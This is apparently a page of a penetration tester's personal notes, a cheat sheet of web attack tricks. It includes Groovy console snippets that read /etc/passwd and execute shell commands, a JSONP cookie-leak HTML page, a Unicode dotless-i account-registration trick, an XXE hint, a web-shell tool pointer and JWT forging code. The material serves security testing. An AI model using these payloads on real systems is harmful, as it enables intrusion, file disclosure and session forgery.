xct's notes
Search…
Other

Groovy Script Console

File-Read

1
new File("/etc/passwd").withReader('UTF-8') { reader ->
2
def line
3
while ((line = reader.readLine()) != null) {
4
println "${line}"
5
}
6
}
Copied!

RCE

1
def process = "ls -lah".execute()
2
println "${process.text}"
Copied!
1
def sout = new StringBuffer(), serr = new StringBuffer()
2
def proc = 'ls -lah'.execute()
3
proc.consumeProcessOutput(sout, serr)
4
proc.waitForOrKill(1000)
5
println "$sout"
Copied!

JsonP

Only useful if a jsonp endpoints requires authentication. A Victim at attacker.com will retrieve the data from victim.com and send its cookie along because of how jsonp works (Reference: https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/).
1
<html>
2
<body>
3
<script>
4
function xct(a) {
5
6
alert(JSON.stringify(a));
7
8
}
9
</script>
10
<script src="targeturl?callback=xct"></script>
11
<body>
12
</html>
Copied!

Unicode Abuse

We can use some special characters like the dotless I to abuse "toUpperCase()", registering for example an admin email address. Reference: https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/

Json to XML

Change JSON Post requests to XML Format, sometimes this works and can be used for XXE, e.g. https://twitter.com/11xuxx/status/1250764273623629826

HTTP/3 Clients

1
docker run -it 'ymuski/curl-http3' bash
Copied!
curl/HTTP3.md at master · curl/curl
GitHub

Interactive Shell from Web Shell

GitHub - mxrch/webwrap: Give me a web shell, I'll give you a terminal. 🌯
GitHub

Timeless Timing Attacks against Remote Targets

The idea is to use HTTP2 to send multiple requests in one which allows us to measure the difference, by looking at which comes back first. Repeat this a lot to get some statistical relevance.

Create JWT from Secret Key via PyJWT

1
import jwt
2
data = {"data": {"username": "xct"}}
3
print(jwt.encode(data, "6cb9...", algorithm="HS256"))
Copied!
Last modified 4mo ago